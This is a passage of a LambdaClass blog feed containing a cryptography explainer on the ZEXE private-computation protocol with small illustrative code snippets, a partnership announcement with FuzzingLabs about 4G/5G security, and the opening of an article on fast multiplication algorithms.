&lt;p&gt;The latter creates a large number of issues where privacy is critical, since it may leak relevant information regarding one’s medical history, payment records, acquaintances and trading partners, etc., which can be used to the advantage of malicious parties.&lt;&#x2F;p&gt;
&lt;p&gt;The first drawback, on the other hand, creates scalability issues, since every transition has to be recomputed by every device forming the network (which can have very different computational power), with the weakest one acting as a bottleneck. This has led to the introduction of mechanisms such as gas to make users pay more for expensive computations and discourage denial-of-service attacks.&lt;&#x2F;p&gt;
&lt;p&gt;Some protocols address these issues partially: Zerocash provides privacy-preserving payments, and Hawk allows state transitions where private data remains hidden from third parties. We can say that they achieve data privacy, but not function privacy, because the transition function being executed is not hidden (even though the input and output parameters may be secret). Function privacy means that an observer is unable to distinguish different computations performed offline from one another.&lt;&#x2F;p&gt;
&lt;p&gt;ZEXE’s aim is to provide a scalable solution to these problems, where both data and function privacy are achieved. This can act as a solid foundation for new forms of data sharing, financial systems, and governance. The main ideas are based on the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. We can run programs offline (or delegate their execution to a powerful but trustless server) and obtain a proof attesting to the validity of the computation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. We can quickly verify the validity of a computation or transition by checking the proof; this operation will be less computationally expensive than performing the whole computation.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Transitions can be accepted into the ledger by checking the proofs.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The proofs will have to satisfy two properties for this system to work:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Privacy: The proofs should not reveal anything, other than the validity of the statement.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Succinctness: the proof can be validated in a time that is independent of the cost of the computation to whose correctness it attests.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;ZEXE will offer users rich functionality, with offline computations used to realize state transitions of multiple applications, running atop the same ledger. The shared execution environment provides the following properties:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Extensibility: users can run arbitrary functions, without seeking anyone&amp;#39;s permission.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Isolation: functions of malicious users cannot interfere with the computations and data of honest users.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Interprocess communication: functions may exchange data with one another.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In the next section, we will cover the main ingredients and how the protocol works: terms such as zk-SNARKs, elliptic curve cryptography, pairings, etc, will be demystified.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;ingredients&quot;&gt;Ingredients&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;decentralized-private-computation&quot;&gt;Decentralized private computation&lt;&#x2F;h3&gt;
&lt;p&gt;The core of ZEXE relies on a new cryptographic primitive to perform computations on a ledger, known as decentralized private computation (DPC), by extending the ideas on how Zerocash works. We can perform the computations offline and present a proof asserting that it is a valid transition on the ledger; the proof can be quickly verified by the nodes of the ledger (much faster than it would take each of them to repeat our original calculation) and be accepted. One disadvantage is that, even though proofs are fast to verify, their generation can be quite expensive (remember that we want to allow the user to run arbitrary programs; thus, the proof system should be able to cope with many different kinds of statements and instructions). We can leverage the construction and create a delegable DPC: we can make trustless servers or devices carry out computations and provide us with proofs that the computations were performed as they should and without leaking relevant information.&lt;&#x2F;p&gt;
&lt;p&gt;The building blocks of the DPC schemes are:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Collision-resistant hash function.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Pseudorandom function family.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Commitments.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * NIZK: non-interactive arguments of knowledge (the proofs).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;To enable delegable DPC we need a further ingredient: randomizable signatures.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;records&quot;&gt;Records&lt;&#x2F;h3&gt;
&lt;p&gt;In Zerocash, when coins are created, their &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Commitment_scheme&quot;&gt;commitments&lt;&#x2F;a&gt; (1) are published on the ledger; when they are consumed, their serial number is published. Every transaction records that some “old” coins were consumed to create “new” coins: it contains the serial numbers of the spent coins, the commitments of the “new” coins, and a proof that the values of the “old” and “new” coins add up (the proof shows that it was a valid transaction and that no money was created or destroyed during the exchange). The transaction is private because we don’t know the values or addresses of the coins exchanged. Since the serial number is published, no coin can be spent more than once.&lt;&#x2F;p&gt;
&lt;p&gt;The units of data, called records (the coins in ZEXE), are bound to arbitrary programs and specify the conditions under which a record can be created and consumed. We can think of them as having tokens or coins that we can spend to run programs and get proofs that what we have done is valid (like in arcade games). To extend the idea to arbitrary functions, we can think of a record as storing some arbitrary data payload. The commitment of a record is published whenever a record is created and its serial number is revealed when it is consumed. A transaction on the ledger contains information on the records spent and created during the operation and a proof that invoking a function on the data payload of the old record produces the data payload of the new records.&lt;&#x2F;p&gt;
&lt;p&gt;A record structure contains:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The address public key.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The data payload.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Birth and death predicates.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * A serial number nonce.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * The record&amp;#39;s commitment.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The record’s commitment is a commitment to all the aforementioned attributes (public key, payload, birth and death predicates, and the serial nonce).&lt;&#x2F;p&gt;
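As a sketch of this structure, with illustrative field names and sizes (the real protocol uses a hiding, binding commitment scheme; the standard-library hasher below is a stand-in used only to show that the commitment covers every attribute):

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

// Illustrative record layout; all names and types are placeholder
// assumptions, not Aleo's actual representation.
#[derive(Hash)]
struct Record {
    address_public_key: [u8; 32],
    payload: Vec<u8>,          // arbitrary application data
    birth_predicate: [u8; 32], // identifier of the birth predicate
    death_predicate: [u8; 32], // identifier of the death predicate
    serial_number_nonce: [u8; 32],
}

impl Record {
    // The commitment binds every attribute: changing any field changes it.
    // DefaultHasher is NOT a cryptographic commitment; it only illustrates
    // the binding-to-all-fields idea.
    fn commitment(&self) -> u64 {
        let mut hasher = DefaultHasher::new();
        self.hash(&mut hasher);
        hasher.finish()
    }
}
```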
&lt;h3 id=&quot;the-record-nano-kernel-rnk&quot;&gt;The Record Nano Kernel (RNK)&lt;&#x2F;h3&gt;
&lt;p&gt;This is an execution environment operating over the records. We can think of it as a kind of operating system for the ledger. It provides process isolation, data ownership, handling of interprocess communications, etc. The RNK ensures that birth and death predicates are met so that during the record’s lifetime certain constraints are enforced. In other words, depending on the input data, predicates can decide whether certain interactions with that record are allowed or not.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;transitions-and-transactions&quot;&gt;Transitions and transactions&lt;&#x2F;h3&gt;
&lt;p&gt;On the ledger, transactions contain the following information:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. The serial number of all consumed records during the transaction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. The commitments of all the records created in the transaction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. A memorandum. This is a string associated with the transaction.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Other construction-specific information.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;More recently, transactions have been updated so that each one is composed of one or more transitions.&lt;&#x2F;p&gt;
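The layout described above can be sketched as follows; the names and types are assumptions for illustration, not Aleo's actual wire format:

```rust
// Sketch of the on-ledger transaction layout described above.
struct Transition {
    serial_numbers: Vec<[u8; 32]>, // records consumed by this transition
    commitments: Vec<[u8; 32]>,    // records created by this transition
    proof: Vec<u8>,                // succinct proof that the transition is valid
}

struct Transaction {
    transitions: Vec<Transition>, // one or more transitions
    memorandum: String,           // arbitrary string bound to the transaction
}
```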
&lt;h3 id=&quot;zk-snarks&quot;&gt;zk-SNARKs&lt;&#x2F;h3&gt;
&lt;p&gt;Zero-knowledge succinct non-interactive arguments of knowledge (zk-SNARKs for friends) are cryptographic primitives that allow one party (the prover) to convince another (the verifier) of the validity of a certain statement or calculation. They have the following properties:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Completeness: Given a statement and a witness (for example, I know $x$ such that $g^x=b$), the prover can convince an honest verifier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Soundness: A malicious prover cannot convince the verifier of a false statement.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Zero-knowledge: the proof reveals nothing else other than the validity of the statement; it does not reveal the witness.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Succinctness: the proof is small and &amp;quot;easy&amp;quot; to verify.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
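To make completeness and soundness concrete, here is a toy, interactive Schnorr-style sigma protocol for the example statement above, "I know $x$ such that $g^x=b$". It uses tiny, insecure parameters chosen for illustration, and it is not the succinct, non-interactive proof system ZEXE relies on:

```rust
// Toy Schnorr-style sigma protocol for "I know x such that g^x = b (mod p)".
// Tiny parameters for illustration only: g = 2 generates a subgroup of
// prime order q = 11 inside the multiplicative group mod p = 23. Real
// systems use ~256-bit groups and apply Fiat-Shamir for non-interactivity.
const P: u64 = 23; // modulus
const Q: u64 = 11; // order of the subgroup generated by g
const G: u64 = 2;  // generator

// Square-and-multiply modular exponentiation.
fn modpow(mut base: u64, mut exp: u64, m: u64) -> u64 {
    let mut acc = 1;
    base %= m;
    while exp > 0 {
        if exp & 1 == 1 {
            acc = acc * base % m;
        }
        base = base * base % m;
        exp >>= 1;
    }
    acc
}

// Prover: commit with randomness r, then answer challenge c.
fn prove(x: u64, r: u64, c: u64) -> (u64, u64) {
    let t = modpow(G, r, P); // commitment
    let s = (r + c * x) % Q; // response
    (t, s)
}

// Verifier: accept iff g^s == t * b^c (mod p).
fn verify(b: u64, t: u64, c: u64, s: u64) -> bool {
    modpow(G, s, P) == t * modpow(b, c, P) % P
}
```

Completeness: an honest prover who knows $x$ always passes. Soundness: a prover answering two distinct challenges from the same commitment would reveal $x$, so without the witness the check fails except with small probability.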
&lt;p&gt;Given that we want to let users perform arbitrary computations, we need the proof system to be able to handle lots of different statements in a rather general way; this will represent the largest cost in the ZEXE protocol. These statements fall in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;NP_(complexity)&quot;&gt;class NP&lt;&#x2F;a&gt; (non-deterministic polynomial time): problems whose solutions can be verified in polynomial time. The NP statements that we need to prove contain predicates defined by the user, which would force us to build everything on zk-SNARKs for universal computations, which depend on very expensive tools. An advantage of zk-SNARKs is that verification is done in constant time; in other words, the amount of time needed to verify is independent of the size of the computation. This is a desirable property from the point of view of privacy, because different verification times could give hints on what kind of operations are being performed.&lt;&#x2F;p&gt;
&lt;p&gt;To tackle this problem, the protocol relies on recursive proof composition: instead of checking the arbitrary NP statement, we can check succinct proofs attesting to the validity of the statement. This way, we avoid zk-SNARKs for universal computations and can instead focus on succinct proofs, which can be hardcoded in the statement. We achieve this by making use of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2012&#x2F;095.pdf&quot;&gt;proof-carrying data&lt;&#x2F;a&gt;: we append to a message a succinct proof that asserts that the result is consistent. For example, instead of directly checking the birth and death predicates (which can be quite general), we can verify succinct proofs $\pi_b$ and $\pi_d$ attesting to the satisfaction of these predicates. Since the inner proofs are succinct, it is (relatively) inexpensive to verify them. Moreover, since the outer proofs are zero-knowledge (and therefore reveal nothing about what is used to generate them), the inner proofs need not be zero-knowledge, further simplifying the calculations.&lt;&#x2F;p&gt;
&lt;p&gt;We can reduce any NP statement to an equivalent NP-complete problem, such as graph-coloring or boolean circuit satisfiability. ZEXE proves the correctness of computations by transforming our arbitrary program into an arithmetic circuit satisfiability problem, defined over a &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;finite field&lt;&#x2F;a&gt; $\mathbb{F}_r$. The problem that arises is that proof verifications involve operations over field $\mathbb{F}_q$, where $r \neq q$. It is, in principle, possible to simulate operations in $\mathbb{F}_q$ over $\mathbb{F}_r$, but this is quite expensive and would make the whole system burdensome. An alternative to this is working with a pair of &lt;a href=&quot;&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;elliptic curves&lt;&#x2F;a&gt;, with some desired properties; we call them pairing-friendly elliptic curves.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;pairing-friendly-elliptic-curves&quot;&gt;Pairing-friendly elliptic curves&lt;&#x2F;h3&gt;
&lt;p&gt;Given an elliptic curve $E$ defined over some finite field $\mathbb{F}_q$, we can define an operation over the points of the curve such that they form a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.entropy1729.com&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;group&lt;&#x2F;a&gt; under that operation. The order of the subgroup $\mathbb{G}$ (that is, its number of elements) is $r$, with $r \neq q$. Two prime-order curves $E_1$ and $E_2$ over fields $\mathbb{F}_q$ and $\mathbb{F}_r$ are said to be pairing-friendly if the size of one’s base field equals the other’s subgroup order and vice versa.&lt;&#x2F;p&gt;
&lt;p&gt;An elliptic curve pairing is a function $e:\mathbb{G}_1\times \mathbb{G}_2 \rightarrow \mathbb{G}_T$ that is bilinear. Here, $\mathbb{G}_1$ and $\mathbb{G}_2$ are the groups over elliptic curves. Bilinear means that, given two points $\mathcal{P_1}$ and $\mathcal{Q}_1$ in $\mathbb{G}_1$ and $\mathcal{P_2}$ and $\mathcal{Q}_2$ in $\mathbb{G}_2$ the following properties hold (we will write all the group operations as additions):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $e(\mathcal{P_1}+\mathcal{Q}_1,\mathcal{P}_2)=e(\mathcal{P_1},\mathcal{P}_2)+e(\mathcal{Q}_1,\mathcal{P}_2)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $e(\mathcal{P_1},\mathcal{P}_2+\mathcal{Q}_2)=e(\mathcal{P_1},\mathcal{P}_2)+e(\mathcal{P}_1,\mathcal{Q}_2)$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
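Applying property 1 repeatedly ($a$ times) and then property 2 ($b$ times) yields the identity that proof systems exploit, keeping the additive notation used above:

```latex
e(a\mathcal{P}_1, b\mathcal{P}_2)
  = a\, e(\mathcal{P}_1, b\mathcal{P}_2)
  = ab\, e(\mathcal{P}_1, \mathcal{P}_2)
```

In other words, scalar multiplications inside either argument can be pulled out of the pairing, which is what lets a verifier check multiplicative relations between committed group elements.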
&lt;p&gt;For efficiency reasons, we need both fields to have multiplicative subgroups whose orders are large powers of $2$. ZEXE uses a curve from the Barreto-Lynn-Scott family, $E_{BLS}$ (with embedding degree(2) 12), which conservatively achieves 128 bits of security. The pairing-friendly companion curve $E_{CP}$ is generated via the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2006&#x2F;372.pdf&quot;&gt;Cocks-Pinch method&lt;&#x2F;a&gt;. This is a very time-consuming step, since it involves exploring many different curves until we find one with the desired properties.&lt;&#x2F;p&gt;
&lt;p&gt;Given that the base field of $E_{CP}$ is larger than that of $E_{BLS}$, operations over the former are more expensive. To avoid this shortcoming, the relation $R_e$ is split into two: $R_{BLS}$ and $R_{CP}$. The latter is responsible for verifying proofs of predicates’ satisfaction, while all other checks depend on the $E_{BLS}$ curve.&lt;&#x2F;p&gt;
&lt;p&gt;Commitments and collision-resistant hash functions can be expressed as efficient arithmetic circuits for Pedersen-type constructions over Edwards curves. Therefore, two additional curves, $E_{Ed,BLS}$ and $E_{Ed,CP}$ over the fields $\mathbb{F}_r$ and $\mathbb{F}_q$ are selected, so as to implement important cryptographic primitives, such as hashing, commitments, and randomizable signatures. This allows us to reduce the difficulty of the multiple checks for NP relations.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;ZEXE is a protocol that was designed to allow users to execute arbitrary programs over public ledgers, without compromising privacy. It addresses two of the main drawbacks of distributed ledgers: first, computations can be performed offline, and a proof of correct execution is submitted to the ledger. Since the proof is fast to verify, this avoids the problem of naïve re-execution and yields a scalable solution. Second, it achieves both data and function privacy: observers cannot learn anything about the data involved in the computations, nor even which specific functions are being called.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol introduces new cryptographic primitives, such as decentralized private computation (DPC) and delegatable DPC; the latter allows users with less powerful devices (such as smartphones) to delegate their computations to untrusted parties and receive proofs that the results obtained correspond to the correct execution of the program. These are supported by zk-SNARKs, relying on elliptic curve pairings and tools for converting arbitrary programs to an arithmetic circuit, where we can check the validity of the calculations.&lt;&#x2F;p&gt;
&lt;p&gt;It gives the basis for fully private applications, becoming an ideal platform for decentralized applications, such as finance, gaming, authentication, governance, and more.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;notes&quot;&gt;Notes&lt;&#x2F;h2&gt;
&lt;p&gt;(1) A commitment allows a user to commit to one value, with the ability to later reveal it. For example, in a roulette bet, I could choose “25” (I really feel very confident) and with the commitment, I am bound to my choice of “25” (though nobody could know, a priori, that I chose 25 since it is hidden). A way to achieve this is by using a collision-resistant hash function and publishing the resulting hash (to make it work, we need to add a random value to the input; otherwise, anyone could hash all the possibilities and see which one has the corresponding hash). If I then try to change my bet, the hash will not match that of my original bet.&lt;br &#x2F;&gt;
(2) The embedding degree of an elliptic curve over the field $\mathbb{F}_q$ is the smallest positive integer $k$ such that $q^k-1$ is divisible by $r$, the order of the group. The embedding degree should be high so that the discrete logarithm problem is hard to solve. However, if $k$ is too large, then the arithmetic over the curves becomes much slower.&lt;&#x2F;p&gt;
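&lt;p&gt;As an illustration of note (1), here is a minimal hash-based commitment sketch in Python; the random nonce plays the role of the extra value mentioned above, and the function names are ours, not from any particular library:&lt;&#x2F;p&gt;

```python
import hashlib
import secrets

def commit(value: str) -> tuple:
    """Commit to a value by hashing it together with a random nonce.

    The nonce (blinding factor) prevents brute-forcing the commitment
    by hashing every possible bet.
    """
    nonce = secrets.token_hex(16)
    digest = hashlib.sha256((nonce + value).encode()).hexdigest()
    return digest, nonce

def reveal(digest: str, value: str, nonce: str) -> bool:
    """Check that (value, nonce) matches the published commitment."""
    return hashlib.sha256((nonce + value).encode()).hexdigest() == digest

# Bind ourselves to the bet "25" without revealing it.
c, nonce = commit("25")
assert reveal(c, "25", nonce)      # honest opening verifies
assert not reveal(c, "26", nonce)  # changing the bet is detected
```

Note that this sketch is binding and hiding only against brute force over the nonce; production schemes (e.g. Pedersen commitments) offer stronger guarantees.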
</description>
      </item>
      <item>
          <title>LambdaClass and FuzzingLabs Partner to Create 4G and 5G Telecommunication security solution</title>
          <pubDate>Wed, 04 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaclass-and-fuzzinglabs-partnership/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaclass-and-fuzzinglabs-partnership/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaclass-and-fuzzinglabs-partnership/">&lt;p&gt;We’re excited to announce a new partnership between LambdaClass and FuzzingLabs. This collaboration brings together two leaders in the tech industry, combining Lambda’s expertise in distributed systems and cryptography with FuzzingLabs’s advanced fuzzing tools, to help ensure the reliability and security of 4G and 5G networks.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;why-lambdaclass-and-fuzzinglabs-are-a-perfect-match&quot;&gt;Why LambdaClass and FuzzingLabs are a perfect match:&lt;&#x2F;h2&gt;
&lt;p&gt;LambdaClass is a venture studio that specializes in building and scaling companies that leverage distributed systems, data engineering and cryptography. We have a track record of success in creating innovative solutions for a wide range of industries, including telecommunications. Our team of experts is uniquely qualified to help businesses and organizations navigate the complex world of highly scalable systems, cryptography and cutting edge technologies.&lt;&#x2F;p&gt;
&lt;p&gt;FuzzingLabs, on the other hand, is a leader in the field of fuzzing, a powerful technique for identifying vulnerabilities in software. The security tools we build will allow projects and companies to identify and fix any issues before they become a problem.&lt;&#x2F;p&gt;
&lt;p&gt;Together, LambdaClass and FuzzingLabs will offer a comprehensive solution for businesses and organizations looking to deploy reliable and secure 4G and 5G networks. By combining our proficiency in distributed systems, cryptography, and fuzzing, we’re able to help our customers take full advantage of the benefits of 4G and 5G while minimizing risks.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;what-this-partnership-means&quot;&gt;What this partnership means&lt;&#x2F;h2&gt;
&lt;p&gt;For LambdaClass, this partnership means access to FuzzingLabs’s advanced fuzzing tools. This will help ensure that our customers’ networks are robust and secure, and can handle the demands of the modern digital economy. LambdaClass will identify vulnerabilities and demonstrate potential methods of exploitation to highlight potential security risks.&lt;&#x2F;p&gt;
&lt;p&gt;For FuzzingLabs customers, this partnership means access to Lambda’s expertise in distributed systems and cryptography. Whether you’re looking to deploy a 4G or 5G network or optimize your existing infrastructure, Lambda has the knowledge and experience to help you succeed.&lt;&#x2F;p&gt;
&lt;p&gt;In addition to this, we will focus on research and development in order to build exploits to show and educate our customers and the community about the precautions to take when building complex systems.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;We’re thrilled to be partnering with FuzzingLabs to bring the power of fuzzing to the world of 5G and telecommunications. By combining our experience and resources, we’re confident that we can help businesses and organizations deploy reliable and secure networks that are ready for the future.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Weird ways to multiply really fast with Karatsuba, Toom–Cook and Fourier</title>
          <pubDate>Mon, 02 Jan 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/weird-ways-to-multiply-really-fast-with-karatsuba-toom-cook-and-fourier/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/weird-ways-to-multiply-really-fast-with-karatsuba-toom-cook-and-fourier/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/weird-ways-to-multiply-really-fast-with-karatsuba-toom-cook-and-fourier/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;The applicability and performance of algorithms depend on how fast certain routine computations can be done. For example, in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Elliptic-curve_cryptography&quot;&gt;elliptic curve cryptography&lt;&#x2F;a&gt;, one needs to calculate the public key as $k\times g=g+g+g+…+g$, where $k$ is a very large integer (typically a number with a hundred digits or so) and $g$ is a point of the elliptic curve $(x,y)$, known as the generator. If done naïvely, that is, by repeatedly adding $g$ to itself, it would take about $10^{100}$ operations (we say that the algorithm runs in $\mathcal{O}(k)$, indicating that the number of operations, up to some constant factor, increases linearly with $k$). The fastest supercomputer can perform less than $10^{18}$ &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;FLOPS&quot;&gt;floating point operations per second&lt;&#x2F;a&gt;; it would take forever to do just one calculation. Nevertheless, we perform such calculations or related ones every day, thanks to faster algorithms: for example, we can reduce the computation time by repeatedly doubling, $g+g=2g$, $2g+2g=4g$, etc., cutting the number of operations to $\mathcal{O}(\log(k))$ (compare $10^{100}$ to something like $100\times \log_2{10}$).&lt;&#x2F;p&gt;
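&lt;p&gt;The doubling trick above can be sketched in a few lines of Python; this is the standard double-and-add loop, written over a generic group operation passed as a function, rather than real elliptic-curve point addition:&lt;&#x2F;p&gt;

```python
def double_and_add(k: int, g, add):
    """Compute k*g = g + g + ... + g in O(log k) group operations.

    `add` is the group law; here we stay generic instead of implementing
    actual elliptic-curve point addition.
    """
    result = None  # stands in for the identity element
    addend = g
    while k > 0:
        if k & 1:  # this bit of k contributes the current power-of-two multiple
            result = addend if result is None else add(result, addend)
        addend = add(addend, addend)  # doubling: g, 2g, 4g, 8g, ...
        k >>= 1
    return result

# Sanity check with integers under addition, where k*g is ordinary k*g:
assert double_and_add(1_000_003, 7, lambda a, b: a + b) == 1_000_003 * 7
```

The loop runs once per bit of $k$, so a 100-digit scalar needs only a few hundred group operations instead of $10^{100}$.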
&lt;p&gt;zk-SNARKs (zero-knowledge succinct non-interactive arguments of knowledge) are important cryptographic primitives that allow one party (the prover) to convince another (the verifier) that a certain statement is true, without revealing anything other than the validity of that statement. The applications of zk-SNARKs are far-ranging, given their potential as a foundation for new forms of governance, data sharing, and financial systems. For example, you could delegate a hard computation to an untrusted party and get a proof that allows you to verify the integrity of the computation, without the need to re-run everything. The key is that proofs are succinct, so they can be verified in the order of hundreds of milliseconds, as opposed to performing the whole computation. The construction relies on transforming the computation into polynomials and checking conditions over those polynomials. Polynomial multiplication can be done very efficiently via the fast Fourier transform (one of the most important algorithms ever devised). Moreover, this calculation can be parallelized: several processors can run parts of the algorithm to make it even faster.&lt;&#x2F;p&gt;
&lt;p&gt;Even simple calculations such as integer multiplications (which take place almost everywhere) can be done faster than the school rule, provided the numbers we are trying to multiply are large enough.&lt;&#x2F;p&gt;
&lt;p&gt;If you want to learn how to speed up some ordinary calculations and make your algorithms run faster, then the next sections are for you.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;divide-and-conquer-karatsuba&quot;&gt;Divide and conquer: Karatsuba&lt;&#x2F;h2&gt;
&lt;p&gt;We all learned at elementary school how to multiply two numbers: we write one below the other, multiply the number above by each digit of the number below, and then add all the partial products:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;      1234&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;×      152&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
